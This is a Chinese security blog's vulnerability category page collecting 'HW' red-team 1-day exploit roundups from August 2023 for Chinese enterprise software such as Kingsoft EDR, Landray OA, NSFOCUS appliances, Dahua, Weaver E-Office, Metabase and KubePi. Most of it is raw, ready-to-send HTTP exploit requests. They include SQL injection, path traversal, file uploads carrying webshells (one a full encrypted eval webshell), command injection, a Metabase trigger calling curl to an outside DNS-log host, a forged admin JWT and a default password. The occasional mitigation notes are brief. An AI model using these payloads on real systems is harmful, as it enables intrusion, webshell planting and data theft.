分类漏洞下的文章 - 月下随笔

首页月影的wiki

1 2023HW漏洞POC、EXP补充 719 阅读 2 海康威视常见漏洞收集 568 阅读 3 Cobalt Strike 插件CSx3Ldr，一键生成免杀木马 422 阅读 4 代码审计分析工具 Fortify-2023 295 阅读 5 windows域控常见打法 271 阅读

渗透测试代码脚本工具备忘录业余爱好闲话系统应急梅花易数小六壬漏洞

登录

月影

累计撰写 85 篇文章
累计收到 101 条评论

首页
栏目
- 渗透测试
- 代码脚本
- 工具
- 备忘录
- 业余爱好
- 闲话
- 系统应急
- 梅花易数
- 小六壬
- 漏洞
页面
- 月影的wiki

搜索到 15 篇与的结果

2023-08-18
HW情报-2023年8月18日-1day汇总金山EDR RCE漏洞开启日志 /Console/inter/handler/change_white_list_cmd.php id参数 POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 Host: *.*.*.* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 131 Origin: http://*.*.*.* Connection: close Referer: http://*.*.*.*/settings/system/user.php?m1=7&m2=0 {"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log=on;","type":"0"}} 设置日志php文件 POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 Host: *.*.*.* Content-Length: 195 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://*.*.*.* Referer: http://*.*.*.*/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7 Connection: close {"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}} 写入php代码 POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1 Host: *.*.*.* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 222 Origin: http://*.*.*.* Connection: close Referer: http://*.*.*.*/index.php {"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}} 最后get请求rce： http://*.*.*.*/check_login2.php 金山终端安全系统V9任意文件上传漏洞POST /inter/software_relation.php HTTP/1.1 Host: 192.168.249.137:6868 Content-Length: 1557 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Origin: http://192.168.249.137:6868 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolFileName" ../../datav.php ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolDescri" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="id" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="version" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="sofe_typeof" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="fileSize" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="param" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolName" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> ------WebKitFormBoundaryxRP5VjBKdqBrCixM蓝凌EKP远程代码执行漏洞受影响版本：蓝凌EKP V16 (最新版)受影响存在远程代码执行漏洞；V15暂无环境验证，可能受影响。修复方案：使用网络ACL限制该OA的访问来源，加强监测，重点拦截GET请求中带有../等目录穿越特征的URL。通过文件上传-->解压-->获取webshell，前台漏洞漏洞路径： /api///sys/ui/sys_ui_extend/sysUiExtend.do POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept: / Connection: Keep-Alive Content-Length: 42 Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}}蓝凌OA前台代码执行POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: *.*.*.* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: / Connection: Keep-Alive Content-Length: 42 Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}}绿盟 NF 下一代防火墙任意文件上传漏洞POST /api/v1/device/bugsInfo HTTP/1.1 Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef Host: --4803b59d015026999b45993b1245f0ef Content-Disposition: form-data; name="file"; filename="compose.php" <?php eval($_POST['cmd']);?> --4803b59d015026999b45993b1245f0ef-- POST /mail/include/header_main.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71 Host: cmd=phpinfo();绿盟 sas 安全审计系统任意文件读取/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1 Host: xxx.xxx.xxx.xxx:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip, deflate Connection: close绿盟 SAS堡垒机 Exec 远程命令执行漏洞GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1 Host: xxx.xxx.xxx.xxx:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Connection: close绿盟 SAS堡垒机 GetFile 任意文件读取漏洞通过漏洞包含 www/local_user.php 实现任意⽤户登录 /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin明御运维审计与风险控制系统堡垒机任意用户注册POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 Host: xxx.xxx.xxx.xxx:port Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99","Chromium";v="100", "Google Chrome";v="100" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/ webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 1121 <?xml version="1.0"?><methodCall><methodName>web.user_add</methodName><params ><param><value><array><data><value><string>admin</string></value><value ><string>5</string></value><value><string>XX.XX.XX.XX</string></value>< /data></array></value></param><param><value><struct><member><name>uname </name><value><string>deptadmin</string></value></member><member><name> name</name><value><string>deptadmin</string></value></member><member><n ame>pwd</name><value><string>Deptadmin@123</string></value></member><me mber><name>authmode</name><value><string>1</string></value></member><me mber><name>deptid</name><value><string></string></value></member><membe r><name>email</name><value><string></string></value></member><member><n ame>mobile</name><value><string></string></value></member><member><name >comment</name><value><string></string></value></member><member><name>r oleid</name><value><string>101</string></value></member></struct></valu e></param></params></methodCall>明源云 ERP ApiUpdate.ashx 文件上传漏洞POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1 Host: target.com Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 856 {{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}企业微信0dayAgentinfo接口Secret信息泄露app="Tencent-企业微信" 1.企业微信后台重置secret 2.waf增加规则禁止访问漏洞点/cgi-bin/gateway/agentinfo 企业微信api 可以利用这个secret获取企业微信的token 利用管理员的token直接操作企业的api 做企业微信管理员的操作。企业微信零日漏洞攻击事件，企业微信XXX.com/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息，可导致企业微信全量数据被获取，文件获取、使用企业微信轻应用对内力量发送钓鱼文件和链接等风险临时缓释措施为将/cgi-bin.gateway/agentinfo在WAF上进行阻断，具体可联系企业微信团队进行应急，请各单位加强防范受影响版本：2.5.x、2.6.930000、以下；不受影响：2.7.x、2.8.x、2.9.x；启明天钥安全网关前台sql注入POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1 Host: xxx.xxx.xxx.xxx:port Connection: close Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Language: zh-CN,zh;q=0.9 Cookie: **** Content-Type: application/x-www-form-urlencoded Content-Length: 39 checkname=123&tagid=123 sqlmap -u "https://xxx.xxx.xxx.xxx:port/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" -v3 --skip-waf --random-agent启明星辰-4A 统一安全管控平台 getMater 信息泄漏成功条件：相应包状态码 200 相应包内容包含关键词："\"state\":true" GET /accountApi/getMaster.do HTTP/1.1 Host: [你的主机名或IP地址] User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36 poc: relative: req0 session: false requests: - method: GET timeout: 10 path: /accountApi/getMaster.do headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36 follow_redirects: true matches: (code.eq("200") && body.contains("\"state\":true")) 修复建议：限制文件访问契约锁电子签章系统 RCEPOST /callback/%2E%2E;/code/upload HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type:multipart/form-data; boundary=----GokVTLZMRxcJWKfeCvEsYHlszxE ----GokVTLZMRxcJWKfeCvEsYHlszxE Content-Disposition: form-data; name="type"; TIMETASK ----GokVTLZMRxcJWKfeCvEsYHlszxE Content-Disposition: form-data; name="file"; filename="qys.jpg" 马儿 ----GokVTLZMRxcJWKfeCvEsYHlszxE任我行 CRM SmsDataList SQL注入漏洞POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 170 Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*任我行CRM系统SQL注入漏洞详情可参考原文有复现截图原文链接：https://mp.weixin.qq.com/s/01uVhwihuwIvpAIrJT4SyQ任我行 CRM SmsDataList 接口处存在SQL注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。 POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 170 Keywords=&StartSendDate=2023-07-17&EndSendDate=2023-08-10&SenderTypeId=0000000000* SenderTypeId参数存在注入，可在SenderTypeId参数值0000000000后自行闭合注入，也可将数据包直接放入sqlmap进行验证
- 2023年08月18日
- 59 阅读
- 0 评论
- 0 点赞
2023-08-17
HW情报-2023年8月17日-1day汇总大华智慧园区任意密码读取攻击GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1大华智慧园区综合管理平台 searchJson SQL注入漏洞GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1 Host: 127.0.0.1:7443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip, deflate大华智慧园区综合管理平台文件上传漏洞POST /publishing/publishing/material/file/video HTTP/1.1 Host: xxx.xxx.xxx.xxx:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 804 Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 Accept-Encoding: gzip, deflate Connection: close --dd8f988919484abab3816881c55272a7 Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp" <%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> --dd8f988919484abab3816881c55272a7 Content-Disposition: form-data; name="poc" poc --dd8f988919484abab3816881c55272a7 Content-Disposition: form-data; name="Submit" submit --dd8f988919484abab3816881c55272a7--大华智慧园区综合管理平台getFaceCaptureSQL注入漏洞该poc来自链接：https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa 提取码：zyxa 详情自行查看 POC: /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D大华智慧园区综合管理平台video任意文件上传漏洞该poc来自链接：https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa 提取码：zyxa 详情自行查看 POST /publishing/publishing/material/file/video HTTP/1.1 Host: UserAgent:Mozilla/5.0(Macintosh;IntelMacOSX10_14_3)AppleWebKit/605.1.15(KHTML,likeGecko)Version/12.0.3Safari/605.1.15 Content-Length:804 Content-Type:multipart/form-data;boundary=dd8f988919484abab3816881c55272a7 Accept-Encoding:gzip,deflate Connection:close --dd8f988919484abab3816881c55272a7 Content-Disposition:form-data;name="Filedata";filename="Test.jsp" Test --dd8f988919484abab3816881c55272a7 Content-Disposition:form-data;name="Submit" submit --dd8f988919484abab3816881c55272a7-- 路径 /publishingImg/VIDEO/230812152005170200.jsp泛微 HrmCareerApplyPerView S Q L 注入漏洞GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1 Host: 127.0.0.1:7443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Accept-Encoding: gzip, deflate Connection: close泛微 ShowDocsImagesql注入漏洞GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Accept-Encoding: gzip, deflate Connection: close泛微 Weaver E-Office9 前台文件包含http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls泛微E-Office uploadify.php后台文件上传漏洞poc来自：https://mp.weixin.qq.com/s/kgEec5abI13lmgh4rtH6Qw POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close Content-Length: 259 Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 Accept-Encoding: gzip --e64bdf16c554bbc109cecef6451c26a4 Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php" Content-Type: image/jpeg <?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?> --e64bdf16c554bbc109cecef6451c26a4-- 上传文件所在路径： /attachment/3466744850/xxx.php 泛微E-Office9文件上传漏洞 CVE-2023-2523 POCPOST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 Host:xxx.xxx.xxx.xxx:port Cache-Control:max-age=0 Upgrade-Insecure-Requests:1 Origin:null Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt Accept-Encoding:gzip, deflate Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection:close ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition:form-data; name="upload_quwan"; filename="1.php." Content-Type:image/jpeg <?phpphpinfo();?> ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt泛微E-Office9文件上传漏洞 CVE-2023-2648 POCPOST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: 192.168.233.10:8082 User-Agent: test Connection: close Content-Length: 493 Accept-Encoding: gzip Content-Type: multipart/form-data ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition: form-data; name="Filedata"; filename="666.php" Content-Type: application/octetstream <?php phpinfo();?> ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt泛微Weaver E-Office9.0文件上传POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: xxx.xxx.xxx.xxx:port User-Agent: test Connection: close Content-Length: 493 Accept-Encoding: gzip Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 Content-Disposition: form-data; name="Filedata"; filename="666.php" Content-Type: application/octet-stream <?php phpinfo();?> --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: xxx.xxx.xxx.xxx:port User-Agent: test Connection: close Content-Length: 493 Accept-Encoding: gzip Content-Type: multipart/form-data ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition: form-data; name="Filedata"; filename="666.php" Content-Type: application/octet-stream <?php phpinfo();?> ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞漏洞描述：FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞，攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。漏洞影响：飞企互联 FE业务协作平台网络测绘：“flyrise.stopBackspace.js”验证POC/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
- 2023年08月17日
- 51 阅读
- 0 评论
- 0 点赞
2023-08-16
HW情报-2023年8月16日-1day汇总 Jeecg-Boot Freemarker 模版注入漏洞(疑似)POST /jeecg-boot/jmreport/qurestSql HTTP/1.1 Host: xxx.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36 Accept-Encoding: gzip, deflate Accept: / Connection: close Content-Type: application/json;charset=UTF-8 Content-Length: 129 {"apiSelectId":"1290104038414721025","id":"1"}漏洞危害1、如果被攻击者利用，可直接getshell；2、如果被攻击者利用，可被用于内网信息收集，扫描目标内网主机；3、如果被攻击者利用，可攻击运行在内网或本地的应用程序；4、如果被攻击者利用，可被用作攻击跳板；修复方法Jeecg官方暂未修复该漏洞，无法通过升级JeecgBoot版本修复该漏洞，建议：1、临时禁用Freemarker高危的代码执行类，如：freemarker.template.utility.Execute（ftl利用方式较多，请自行判断）KubePi JwtSigKey 登陆绕过漏洞CVE-2023-22463漏洞描述KubePi 中存在 JWT 硬编码，攻击者通过硬编码可以获取服务器后台管理权限，添加任意用户漏洞影响库贝派网络测绘“库贝皮”CVE-2023-22463漏洞复现POST /kubepi/api/v1/users HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36 accept: application/json Accept-Encoding: gzip, deflate Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8 { "authenticate": { "password": "{{randstr}}" }, "email": "{{randstr}}@qq.com", "isAdmin": true, "mfa": { "enable": false }, "name": "{{randstr}}", "nickName": "{{randstr}}", "roles": [ "Supper User" ] } Kuboard默认口令漏洞描述：Kuboard，是一款免费的 Kubernetes 图形化管理工具，Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard，管理Kubernetes。admin/kuboard123Metabase validate 远程命令执行漏洞CVE-2023-38646漏洞描述Metabase是一个开源的数据分析和可视化工具，它可以帮助用户轻松连接到各种数据源，包括数据库、云服务和API，然后使用绘图的界面进行数据查询、分析和可视化。需身份认证的远程攻击者利用该漏洞可以在服务器上以运行元数据库服务器的权限执行任意命令漏洞影响元数据库网络测绘应用程序=“元数据库” CVE-2023-38646漏洞复现POCGET请求 /api/session/properties相应包中包含setup-token字段后用获取到的token发送post数据包：POST /api/setup/validate HTTP/1.1 Host: Content-Type: application/json Content-Length: 812 { "token": "获取的token", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x", "advanced-options": false, "ssl": true }, "name": "an-sec-research-team", "engine": "h2" } }Milesight VPN server.js 任意文件读取漏洞GET /../etc/passwd HTTP/1.1 Host: Accept: / Content-Type: application/x-www-form-urlencodedNacos-Sync未授权漏洞https://xxx.xxx.xxx/#/serviceSyncOpenfire身份认证绕过漏洞(CVE-2023-32315)GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1Panabit iXCache网关RCE漏洞CVE-2023-38646 POST /cgi-bin/Maintain/date_config HTTP/1.1 Host: 127.0.0.1:8443 Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Content-Type: application/x-www-form-urlencoded Content-Length: 107 ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1Panel loadfile 后台文件读取漏洞详情可参考：https://zkunu7syvm.feishu.cn/docx/JmKgddUcMo4Rt2xLys4c4lN2nbcPOST /api/v1/file/loadfile HTTP/1.1 Host: [你的主机名或IP地址] Content-Type: application/json Content-Length: [请求体长度，以字节为单位] {"paht":"/etc/passwd"}PigCMS action_flashUpload 任意文件上传漏洞POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1 Host: Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----aaa ------aaa Content-Disposition: form-data; name="filePath"; filename="test.php" Content-Type: video/x-flv <?php phpinfo();?> ------aaa /cms/upload/images/2023/08/11/1691722887xXbx.phpQAX-Vpn存在x遍历及任意账号密码修改漏洞https://x.xxx.xxx.cn/admin/group/xgroupphp?id=1 https://x.xxx.xxx.cn/admin/group/xgroupphp?id=3 cookie: admin id=1; gw admin 